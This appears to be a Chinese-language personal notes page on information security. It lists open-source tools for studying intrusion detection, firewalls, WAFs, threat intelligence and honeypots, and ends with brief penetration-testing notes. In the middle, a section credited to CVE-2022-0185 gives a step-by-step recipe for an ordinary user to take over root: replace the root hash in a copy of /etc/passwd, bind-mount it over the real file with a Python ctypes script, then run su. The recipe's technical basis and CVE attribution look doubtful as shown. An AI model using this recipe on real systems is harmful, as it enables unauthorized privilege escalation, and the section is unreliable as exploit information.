信息安全
概述
参考:
Information security(信息安全,简称 infosec) 是通过降低信息风险来保护信息的实践。
Reverse engineering(逆向工程) Reverse engineering
Software cracking(软件破解)
- Wiki, Software cracking(软件破解)
Penetration test(渗透测试)
- Wiki, Penetration test(渗透测试)
待总结
要研究态势感知或安全运营中心,可以采用 OSSIM
要研究入侵防御技术,可以采用 Snort 或 Security Onion
要研究防火墙技术,可以采用 pfSense 或 OPNsense
要研究 Web 应用防火墙(WAF ),可以采用 ModSecurity
要研究威胁情报技术,可以采用 MISP 或 OpenCTI
要研究漏洞扫描技术,可以采用 OpenVAS 或 W3AF
要研究堡垒机技术,可以采用 JumpServer
要研究蜜罐技术,可以采用 T-Pot 或 Hfish
学习
B 站 - 沈奇教练,【黑客奇谈】第三期:0基础成为黑客有多难?15年网安经验倾囊相授,教你正确入门网络安全
历史漏洞
CVE-2022-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0185 漏洞,通过如下操作,可以让普通用户直接重置 root 密码。主要利用的是 bind mount 功能,将 /etc/passwd 文件覆盖
$ cd ~
$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/
# 将第一行的 root:x 改为 root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"<HOME>/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
把上面的 <HOME> 换成你的 home 目录
$ python3 mount-passwd.py
$ su root
输入密码:password
信息安全历史
渗透测试
参考:
- Wiki, Penetration test(渗透测试)
BurpSuite
渗透测试的本质是信息收集
反馈
此页是否对你有帮助?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.